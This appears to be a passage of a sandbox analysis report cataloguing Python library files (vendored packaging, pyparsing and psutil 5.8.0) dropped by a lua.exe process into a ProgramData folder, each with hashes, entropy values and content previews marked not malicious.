SSDEEP:	384:FFhKj+BkVQ9IEszaYuhdwhOuhEFIOI10liN36fRZMnQKx/OIGtNbc6:lKIkVlEs7uhdwhOuhEFxISlO9Qg/O9g6
MD5:	8E104C1478944512DB1284C6425D7E5C
SHA1:	7761CF1DF1CA1144DCE6A5D04B88E2E4179FDCAB
SHA-256:	B98A7D975DC5D0B7249D2E9DE0DEB4CAD88180598884A89D78EABD027B314DCA
SHA-512:	00C42FC324332D04A438987D70AFFFAD855800CD9FE7F6CF52B62321AA2718E70814ABE8076FEA2FE158D32779DFD44DC0232C92EDC6307AB83C7B7E38CE45EA
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import abc.import functools.import itertools.import re..from ._compat import string_types, with_metaclass.from ._typing import TYPE_CHECKING.from .utils import canonicalize_version.from .version import Version, LegacyVersion, parse..if TYPE_CHECKING: # pragma: no cover. from typing import (. List,. Dict,. Union,. Iterable,. Iterator,. Optional,. Callable,. Tuple,. FrozenSet,. ).. ParsedVersion = Union[Version, LegacyVersion]. UnparsedVersion = Union[Version, LegacyVersion, str]. CallableOperator = Callable[[ParsedVersion, str], bool]...class InvalidSpecifier(ValueError):. """. An invalid specifier was found, users should refer to PEP 440.. """...class BaseSp

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\tags.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	24067
Entropy (8bit):	4.80313202952782
Encrypted:	false
SSDEEP:	384:FSdp8Ay8XuveWXnE/3okOEl2hx1plf3BoQYKMKEp9xkzOw9J0sZTp0d5BHUfbvOO:8drUvtnE/okOEl2hx1plf3BoQ3D69xkh
MD5:	5976599D204E1C99A69A745701CD1331
SHA1:	C8AC635F74B5F9A23845EBBF95CE5DDF12C51470
SHA-256:	34A312DFB668FE75AB67182C0FACDB5EC5E073D79D9FD9B5EB470188B98725D1
SHA-512:	6E52BDC7B6FB593C3450002F622A1A4A8572932EC5CE108F661900A492D9C89CE042739767F8CF46AA0C3D88A448B8C7217C0AC0072C914F56E43865DC32FCB6
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import..import distutils.util..try:. from importlib.machinery import EXTENSION_SUFFIXES.except ImportError: # pragma: no cover. import imp.. EXTENSION_SUFFIXES = [x[0] for x in imp.get_suffixes()]. del imp.import logging.import os.import platform.import re.import struct.import sys.import sysconfig.import warnings..from ._typing import TYPE_CHECKING, cast..if TYPE_CHECKING: # pragma: no cover. from typing import (. Dict,. FrozenSet,. IO,. Iterable,. Iterator,. List,. Optional,. Sequence,. Tuple,. Union,. ).. PythonVersion = Sequence[int]. MacVersion = Tuple[int, int]. GlibcVersion = Tuple[int, int]...logger = logging.getLogger(__name__)..INTERPRETER_SHORT_NAMES = {. "python": "

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1811
Entropy (8bit):	4.76405669637177
Encrypted:	false
SSDEEP:	24:q9O0ope2D6gpeS1ujJcz55V5+It5yzlQQkMNx/U9wytUvWY09ab1LJ0ztjVx:IDo8HKac1V+IMl7xs9wyaR0Mb9q1Vx
MD5:	ED9896111C9B49550314BC6B238E5A11
SHA1:	F0B8F8941F45F8A4821CBF564BE73FD27524651A
SHA-256:	452865BE78CED82B58483F2EAE2DF67EB30C14C4E607EDE286CAB5FA08732C4C
SHA-512:	46558CA841C4A65EC41458E018C7D1850D5851E54AD0C5F04F3B201B5D24DB44A3A24C4F2959CFAFF491B575DE16798962AE18B290656B1000C78848B1507AC1
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import re..from ._typing import TYPE_CHECKING, cast.from .version import InvalidVersion, Version..if TYPE_CHECKING: # pragma: no cover. from typing import NewType, Union.. NormalizedName = NewType("NormalizedName", str).._canonicalize_regex = re.compile(r"[-_.]+")...def canonicalize_name(name):. # type: (str) -> NormalizedName. # This is taken from PEP 503.. value = _canonicalize_regex.sub("-", name).lower(). return cast("NormalizedName", value)...def canonicalize_version(_version):. # type: (str) -> Union[Version, str]. """. This is very similar to Version.__str__, but has one subtle difference. with the way it handles the release segment.. """.. try:. version = Version(_version). except InvalidVe

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\version.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15470
Entropy (8bit):	4.505586612608989
Encrypted:	false
SSDEEP:	384:FMp0TNccqOwOvEYj73WnmgWilqllrr6dWgni:+0VqOwOvEYj7GnLWilAlrr643
MD5:	E68593DD6268BA28C359E5830A577214
SHA1:	9ED72920A9DC00F4E29FA68DBB7C3843448D59F3
SHA-256:	0A76E6F8E3BD0FFA9DF194C5C7315C8D26AF7B14981599B279AA0FBCCB2380F7
SHA-512:	E477ECB8FBBB3643C0485640F94CB80D8681089036F164E800BB9694C1D9FB4DA606B70197C608E4427BE8D9CE9320B1FD51B8EE4055E312FE4DC3067C122602
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import collections.import itertools.import re..from ._structures import Infinity, NegativeInfinity.from ._typing import TYPE_CHECKING..if TYPE_CHECKING: # pragma: no cover. from typing import Callable, Iterator, List, Optional, SupportsInt, Tuple, Union.. from ._structures import InfinityType, NegativeInfinityType.. InfiniteTypes = Union[InfinityType, NegativeInfinityType]. PrePostDevType = Union[InfiniteTypes, Tuple[str, int]]. SubLocalType = Union[InfiniteTypes, int, str]. LocalType = Union[. NegativeInfinityType,. Tuple[. Union[. SubLocalType,. Tuple[SubLocalType, str],. Tuple[NegativeInfinityType, SubLocalType],. ],. ...,. ]

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\pyparsing.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	232055
Entropy (8bit):	4.628655516703601
Encrypted:	false
SSDEEP:	6144:Nk7fj9Cr2dr4a4Nx+cOgq0emJ2gW6YnqTX8meDeJZOtxjK5cbE/NbE7EVkAP:KgOE5
MD5:	FC9C293F584C3BF6DE629AC89E5A0E83
SHA1:	6823808A8E61FD3E3EC722EF45AD6CF1B4BD9AA2
SHA-256:	B66AE9FA5BBEA8ED62EF967320DE40D769CA4510F50A6E15A64FB92D1F6B8A6B
SHA-512:	1D037ACBA4B9362A24F2E8867FA5B85FB1AAB1CF121DD0054EF7706E643E0D9D989A7CC202D04C5E9ACEE4A73D1AF08E082CA19D9C34A9FC04E4E9B001DE42E0
Malicious:	false
Preview:	# module pyparsing.py..#..# Copyright (c) 2003-2018 Paul T. McGuire..#..# Permission is hereby granted, free of charge, to any person obtaining..# a copy of this software and associated documentation files (the..# "Software"), to deal in the Software without restriction, including..# without limitation the rights to use, copy, modify, merge, publish,..# distribute, sublicense, and/or sell copies of the Software, and to..# permit persons to whom the Software is furnished to do so, subject to..# the following conditions:..#..# The above copyright notice and this permission notice shall be..# included in all copies or substantial portions of the Software...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT...# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY..# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\extern\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2094
Entropy (8bit):	4.216388720293622
Encrypted:	false
SSDEEP:	48:kcAd8WP+KzxY43fHpCm2rCkALsIy+FSWQn:kpdXPdf3/ArVM0
MD5:	CB4101A887D481F3FFD41CE8C838BE86
SHA1:	C1292F7A85B83491ADF1F66A5512880F2B2E0E38
SHA-256:	1A3EDB32DE58239706B7A91C83E33618DC4E2FF936C7E6D494BCCF6992BCB9E9
SHA-512:	D5440F23AD0EDF7A1BE17D9C126AF46EC87E5050196D413A0EAAAEF952857E1B274F4ABA4D819BEEEAE7A551092BB5E6D7DF11E438ECA10E9ED4B9FC74CB4CD2
Malicious:	false
Preview:	import sys...class VendorImporter:. """. A PEP 302 meta path importer for finding optionally-vendored. or otherwise naturally-installed packages from root_name.. """.. def __init__(self, root_name, vendored_names=(), vendor_pkg=None):. self.root_name = root_name. self.vendored_names = set(vendored_names). self.vendor_pkg = vendor_pkg or root_name.replace('extern', '_vendor').. @property. def search_path(self):. """. Search first the vendor package then as a natural package.. """. yield self.vendor_pkg + '.'. yield ''.. def find_module(self, fullname, path=None):. """. Return self when fullname starts with root_name and the. target module is one vendored through this importer.. """. root, base, target = fullname.partition(self.root_name + '.'). if root:. return. if not any(map(target.startswith, self.vendored_names)):. return. retu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil-5.8.0.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil-5.8.0.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1549
Entropy (8bit):	5.124627749498161
Encrypted:	false
SSDEEP:	48:2kVOOrXIJ9JzAwJPl6432svv32s3EsIq3tYHv:2vOrXIJ9JzAw7R3r3zVfaP
MD5:	E35FD9F271D19D5F742F20A9D1F8BB8B
SHA1:	51EDE753F5D20B28226AB01C133AD67797EAF716
SHA-256:	24C12984500CAA07FFDCE19EEBC06396C5E6D244B573BC6C438F4A6EF8E56C1B
SHA-512:	B228EDA8BE2D189160324960A52AAAC8DB4E12418E987478F36AF21D448BE057FBE979562F7F4707244CEE11572E5018DD3488B8A3D6B6C002B158F76D4D14EA
Malicious:	false
Preview:	BSD 3-Clause License..Copyright (c) 2009, Jay Loden, Dave Daeschler, Giampaolo Rodola'.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:.. * Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer... * Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution... * Neither the name of the psutil authors nor the names of its contributors. may be used to endorse or promote products derived from this software without. specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil-5.8.0.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	22626
Entropy (8bit):	5.348498436683802
Encrypted:	false
SSDEEP:	384:XgxGcsn560IwPb1p2t6/acDLXtJFEIucotEOeA1:XgxC6Pgo6/N9JFEnI0
MD5:	FD44F21A13390E9455AEC26166344E90
SHA1:	F3803894A357E04C9CD0A8BB929FE1F7995E0B6A
SHA-256:	069863FDA59A3742371C9F60AD268B0B04C760A595C7D1A1DE557D590BF205E6
SHA-512:	D86F021129499EFA2954BCC5F870BC96D26641F9158B658224EFA08EA652E98FCE74D676BCC8C8C2FF353CBC95A73D5378783470B3BFA5DA130461F129123C0F
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: psutil.Version: 5.8.0.Summary: Cross-platform lib for process and system monitoring in Python..Home-page: https://github.com/giampaolo/psutil.Author: Giampaolo Rodola.Author-email: g.rodola@gmail.com.License: BSD.Keywords: ps,top,kill,free,lsof,netstat,nice,tty,ionice,uptime,taskmgr,process,df,iotop,iostat,ifconfig,taskset,who,pidof,pmap,smem,pstree,monitoring,ulimit,prlimit,smem,performance,metrics,agent,observability.Platform: Platform Independent.Classifier: Development Status :: 5 - Production/Stable.Classifier: Environment :: Console.Classifier: Environment :: Win32 (MS Windows).Classifier: Intended Audience :: Developers.Classifier: Intended Audience :: Information Technology.Classifier: Intended Audience :: System Administrators.Classifier: License :: OSI Approved :: BSD License.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: Microsoft :: Windows :: Windows 10.Classifier: Operating System :: Microsoft :: Windows :: Win

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil-5.8.0.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4393
Entropy (8bit):	5.6392435827004395
Encrypted:	false
SSDEEP:	96:JXmNZJoBJDhc3JGmDgAEM7dJPDoYNrBXN0FgkmvtCz9Hlk/f+k:JX4rR77f7
MD5:	D64CCEC80476B3FFDBB2E4B0BD54F434
SHA1:	A923CDE208F4E064AD382E061B7488AD89A32D90
SHA-256:	505387ADCCA8028D0533DBE5C896E3C33B4E5402C94688141CD7FAB0BEF191A7
SHA-512:	103BCDC4A9AADEEB3CB166D738E13DC9B05F1CAF5F55D3D0421A80A361427AEC1C0FFFCFA83F636AA7F1B50AE6DC952398A342F0394975539978F0D219F5FAD6
Malicious:	false
Preview:	psutil-5.8.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..psutil-5.8.0.dist-info/LICENSE,sha256=JMEphFAMqgf_3OGe68BjlsXm0kS1c7xsQ49KbvjlbBs,1549..psutil-5.8.0.dist-info/METADATA,sha256=Bphj_aWaN0I3HJ9grSaLCwTHYKWVx9Gh3lV9WQvyBeY,22626..psutil-5.8.0.dist-info/RECORD,,..psutil-5.8.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..psutil-5.8.0.dist-info/WHEEL,sha256=zMRqF9ZfHGxBPfvcWwE-LxcVkdB1hhr8hy4cOfZGPZU,101..psutil-5.8.0.dist-info/top_level.txt,sha256=gCNhn57wzksDjSAISmgMJ0aiXzQulk0GJhb2-BAyYgw,7..psutil/__init__.py,sha256=kBgynYzuxNXqFVpCNdTr0RqSmR-TqcHraDedB2ycPak,86749..psutil/__pycache__/__init__.cpython-37.pyc,,..psutil/__pycache__/_common.cpython-37.pyc,,..psutil/__pycache__/_compat.cpython-37.pyc,,..psutil/__pycache__/_psaix.cpython-37.pyc,,..psutil/__pycache__/_psbsd.cpython-37.pyc,,..psutil/__pycache__/_pslinux.cpython-37.pyc,,..psutil/__pycache__/_psosx.cpython-37.pyc,,..psutil/__pycache__/_psposix.cpython-37.pyc,,..ps

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil-5.8.0.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	101
Entropy (8bit):	5.070312508049368
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlViHoKKjP+tkKcVhhLn:RtBMwlViQWK3hhLn
MD5:	D5CA891EDE6691C0A4CBCCC9148DA70D
SHA1:	B7DED86283B64CF278D33A759E1BA5B448EE81D5
SHA-256:	CCC46A17D65F1C6C413DFBDC5B013E2F171591D075861AFC872E1C39F6463D95
SHA-512:	59C47BB3F4DD63177B34CD9722F79BB9E47431A78B5F50ECC697B592806BC6A9009E73F28F3146EEE9295FD8FD3989A2D7F32B27B15C38C894A74CAC8368D35B
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.36.2).Root-Is-Purelib: false.Tag: cp37-cp37m-win_amd64..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil-5.8.0.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.8073549220576046
Encrypted:	false
SSDEEP:	3:Sn:Sn
MD5:	D3401109F4F08FB7F9C3F411EA9209F2
SHA1:	A841BF4DA24F2D960AD77A39767FEA360F00807F
SHA-256:	8023619F9EF0CE4B038D20084A680C2746A25F342E964D062616F6F81032620C
SHA-512:	03C2FDF9B0A069B9EABCFE9FF5BE6D71E63239AB3B6716CE3C098E30376D3B533E17A1713FA84E46BE292C091155C3A7EA792B032FBCD9BEE848A491D428A507
Malicious:	false
Preview:	psutil.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	86749
Entropy (8bit):	4.506163593994137
Encrypted:	false
SSDEEP:	768:ksqkpHMgP57E7kPdG6T7L1NoHEjcijG52wj01FLKoFpD2b6+Xkbj/2np4p6sG/jc:nfx1pmhbqWF64zFU
MD5:	29E928C48046A0050384F17B0F26FD1B
SHA1:	CDD96ED3B4C13BD3C426A20F204CB66099B5B801
SHA-256:	9018329D8CEEC4D5EA155A4235D4EBD11A92991F93A9C1EB68379D076C9C3DA9
SHA-512:	29D4CF31640B3D4803429767D2C633EA18299962E9BE61B22D87F141E4B267BCAD89F326838251F0F3DC12D00034100E6CA38A9397663EBBA46536B1E9E6323A
Malicious:	false
Preview:	# -- coding: utf-8 --..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""psutil is a cross-platform library for retrieving information on.running processes and system utilization (CPU, memory, disks, network,.sensors) in Python. Supported platforms:.. - Linux. - Windows. - macOS. - FreeBSD. - OpenBSD. - NetBSD. - Sun Solaris. - AIX..Works with Python versions from 2.6 to 3.4+.."""..from __future__ import division.import collections.import contextlib.import datetime.import functools.import os.import signal.import subprocess.import sys.import threading.import time.try:. import pwd.except ImportError:. pwd = None..from . import _common.from ._common import AccessDenied.from ._common import Error.from ._common import memoize_when_activated.from ._common import NoSuchProcess.from ._common import TimeoutExpired.from ._common import wrap_numbers as _wrap_numbers.from .

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\__init__.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	63407
Entropy (8bit):	5.41185915045016
Encrypted:	false
SSDEEP:	1536:kjk7aK10LUZ+gYxI4IOcmOwwA99mJrKl4tWlnxE:uE1yBjJhsKlBk
MD5:	83F0B961C35B3E94473E324C5E54B414
SHA1:	6C002D716D8E4A5FA3F098AEDADBA43A863520C8
SHA-256:	38E0F55FDC7F6F1FEB8E8F89CCB8F7A6D714C8335E34E5852125E076324E6F5C
SHA-512:	0307781099B0254EFA0C49D2110507CC3475947169E406433EC45161F194BDC558F3889D778DB55C2069B23FF9821111C88D78EB0E69646C76A1DAB19F86B4E8
Malicious:	false
Preview:	B.........R`.R...............G...@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.y.d.d.l.Z.W.n...e.k.r.......d.Z.Y.n.X.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d.l.m'Z'..d.d.l.m(Z(..d.d.l.m)Z)..d.d.l.mZ..d.d.l.m+Z+..d.d.l.m,Z,..d.d.l.m-Z-..d.d l.m.Z...d.d!l.m/Z/..d.d"l.m0Z0..d.d#l.m1Z1..d.d$l.m2Z2..d.d%l.m3Z3..d.d&l.m4Z4..d.d'l.m5Z5..d.d(l.m6Z6..d.d)l.m7Z7..d.d*l.m8Z8..d.d+l.m9Z9..d.d,l.m:Z:..d.d-l.m;Z;..d.d.l.m<Z<..d.d/l.m=Z=..d.d0l.m>Z>..d.d1l.m?Z?..d.d2l.m@Z@..d.d3l.mAZA..d.d4l.mBZB..d.d5l.mCZC..d.d6l.mDZD..d.d7l.mEZE..d.d8l.mFZF..e?..r@d9ZGd.d:l.mHZI..d.d;lHmJZJ..d.d<lHmKZK..d.d=lHmLZL..d.d>lHmMZM....n.eF..r.d.d?l.mNZI..d.d@lOmPZP..d.dAlOmQZQ..d.dBlOmRZR..d.dClOmSZS..d.dDlOmTZT..d.dElOmUZU..d.dFlNmVZV..d.dGlNmWZW..d.dHlNmXZX..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_common.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20609
Entropy (8bit):	5.6564486728533785
Encrypted:	false
SSDEEP:	384:3uEC/GO9IZKS3FnTaE4NBdhgZzv7DZbsWqVGNghoNJQa2s:3w/GO9naejBd8vfZbsDVmgmcs
MD5:	6EC76D4EB5DD4F3322F6910ABA53D214
SHA1:	0200526BC436DFFFA7A77497189CC8E1C741CB2F
SHA-256:	CD9E24F93DB3A70BC71EBC547F45505F120489BC923E282CDA39DE4F54121819
SHA-512:	A1798A91CF8C0F3B03ECA93AD5DA8CFC4267DE0BCCF79B179BEDE038FEF4116DB1F92CA649DBEA632A2237714F3F0F5287321FD8778A0649722F1D7DA830C335
Malicious:	false
Preview:	B.........R`jf...............N...@...s8...d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...y.d.d.l.m.Z...W.n...e.k.r.......d.Z.Y.n.X.y.d.d.l.m.Z...W.n...e.k.r.......d.Z.Y.n.X.e.j.d.k...r.d.d.l.Z.n.d.Z.e.j.d...d.k.Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d d!d"d#d$d%d&d'd(d)dd+d,d-d.d/d0d1d2d3d4d5d6d7d8d9d:d;d<d=d>d?d@dAdBdCdDdEdFdGdHdIdJdKdLdMdNdOdPdQdRdSdTdUdVdWdXdYdZgNZ.e.j.d[k.Z.e.j.d\k.Z.e.j...d]..Z.e.j...d^..Z e Z!e.j...d_..Z"e.j...d`..Z#e.j...da..Z$e"..p.e#..p.e$Z%e.j...db..Z&e.j...dc..Z'ddZ(deZ)dfZdgZ+dhZ,diZ-djZ.dkZ/dlZ0dmZ1dnZ2doZ3dpZ4dqZ5drZ6dsZ7dtZ8duZ9dvZ:dwZ;dxZ<dyZ=dzZ>d{Z?d\|Z@d}ZAe.d.k...r.d~ZBd.ZCd.ZDn G.d.d...d.e.jE..ZFeG...HeFjI....e.d.k...r.d.ZJd.ZKn G.d.d...d.e.jE..ZLeG...HeLjI....e..M..ZNe...s.d.ZOn2y.e..P..ZOW.n$..eQk...rH......e...r@d.n.d.ZOY.n.X.e.dHd.d.d.d.d.d.g...ZRe.dDd.d.d.d.g...ZSe.dBd.d.d.d.d.d.g...ZTe.dCd.d.d.d.d.d.g...ZUe.dEd.d.d.d.d.d.d.d.g...ZVe.dId.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_compat.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	5.437226652660616
Encrypted:	false
SSDEEP:	192:Lfwk4LKeQdJSBby0PB9ldt0serMRGB8Fdwt1xvwkWWaXPw4snsY:LfwZZ0QBb7Pz1e4RGF9wkWvfw4snf
MD5:	02BD138C9B2B40E265B27D3FC0DFA05F
SHA1:	F639DEBFDB8C0555EE8FA0E111BD75591668D015
SHA-256:	8C9B9AB97EC401661A91BE46F5A2BDE5EA4F8D394F5C45CA2647F815540F4D7A
SHA-512:	FAFD7F420C20490CF95C17FC57BDCFCDB972F1DB39441BF9919187B0B1B18268626C459A507E025C97DAC225527FD3746E56F77213C15DA50D17EA26DA23898B
Malicious:	false
Preview:	B.........R`.8...................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.g.Z.e.j.d...d.k.Z.e...Z.e.r.e.Z.e.Z.e.Z.e.Z.e.Z.d.d...Z.d.d...Z.n e.Z.e.Z.e.Z.e.Z.d.d...Z.d.d...Z.e.r.e.Z.n.e.Z.e.e.d.f.d.d...Z.e.r.e.Z.e.Z.e.Z.e.Z.e.Z.e.Z.n.d.d.l.Z.e.f.d.d...Z.e.e ..d.d.....Z.e.e ..d.d.....Z.e.e ..d.d.....Z.e.e ..d d.....Z.e.e ..d!d.....Z.e.e ..d"d.....Z.e..!..d#k...r.y.e"e.j#d$....W.n2..e.k...r.......Y.n...e"k...r.......e$d%....Y.n.X.y.d.d&l.m%Z%..W.n...e&k...rl......y.d.d'l'm(Z(..W.n"..e&k...r.......d.d'l)m(Z(..Y.n.X.e..d(d)dd+d,g...Z+G.d-d...d.e,..Z-e...f.e.e.e.e/e0d...f...e1e2e0e3f.d/d0..Z4d9d3d...Z%Y.n.X.y.d.d4l5m6Z6..W.n,..e&k...r.......e.j7e.j8B.d.f.d5d...Z6Y.n.X.y.d.d6l5m9Z9..W.n ..e&k...r.......d:d8d...Z9Y.n.X.d.S.);z.Module which provides compatibility with older Python versions..This is more future-compatible rather than the opposite (prefer latest.Python 3 way of doing things).......N..PY3..long..range..super..unicode..basestri

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_psaix.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15028
Entropy (8bit):	5.394370580162659
Encrypted:	false
SSDEEP:	384:+YFNn+L28mQWBXNchQhzWAXi1OdmPptQi9Y2:+YFNn+LnmQe4ozWAeOMPpt/9Y2
MD5:	AC534BC010E76AB658A525B7BF088F1A
SHA1:	7462D83DE07FDFD9DDEA7400793AA201CD85423B
SHA-256:	B55D3D04B5534FFC8E5F41F0116F1A62E2CB832ED2CC62CECB194FAEB1459827
SHA-512:	A8F2DF1BCBCDC72A113316E476B52C765D96EF15D7F06AF7D6D04CD4665B69EF7435610331C9942BBA30E66F324F285E59957FFEE4E70D1997189446D6075FA2
Malicious:	false
Preview:	B.........R`{H...................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.e e.d...Z!e e.d...Z"e e.d...Z#e..$..Z%e.j&Z&e.j'e.j(e.j)e.je.j+e.j,e.j-e.j,e.j.e.j/i.Z0e.j1e.j2e.j3e.j4e.j5e.j6e.j7e.j8e.j9e.j:e.j;e.j<e.j=e.j>e.j?e.j@e.jAe.jBe.jCe.jDe.jEe.jFe.jGe.jHi.ZIeJd.d.d.d.d.d.d.d d!..ZKe.d"d#d$g...ZLeLZMe.d%d&d'd(d)g...ZNe.dd+d,d-d.d/g...ZOd0d1..ZPd2d3..ZQd4d5..ZRd6d7..ZSd8d9..ZTd:d;..ZUd<d=..ZVe.jWZWe.jXZXdRd?d@..ZYe.jZZZe"..r.e.j[Z[dSdBdC..Z\dDdE..Z]dFdG..Z^dHdI..Z_dJdK..Z`dLdM..ZadNdO..ZbG.dPdQ..dQec..Zdd.S.)Tz.AIX platform implementation......N)...namedtuple.....)..._common)..._psposix)..._psutil_aix)..._psutil_posix)...AccessDenied)...conn_to_ntuple)...get_procfs_path)...memoize_when_activated)...NIC_DUPLEX_FULL)...NIC_DUPLEX_HALF)

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_psbsd.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20797
Entropy (8bit):	5.446604134426972
Encrypted:	false
SSDEEP:	384:FpVUsqoMW44yYgcngH5ro28NIUWDxF2VM8P5z3Qa66A9jB:XqEK8nYMZIUWCVM8Rz3J66A9jB
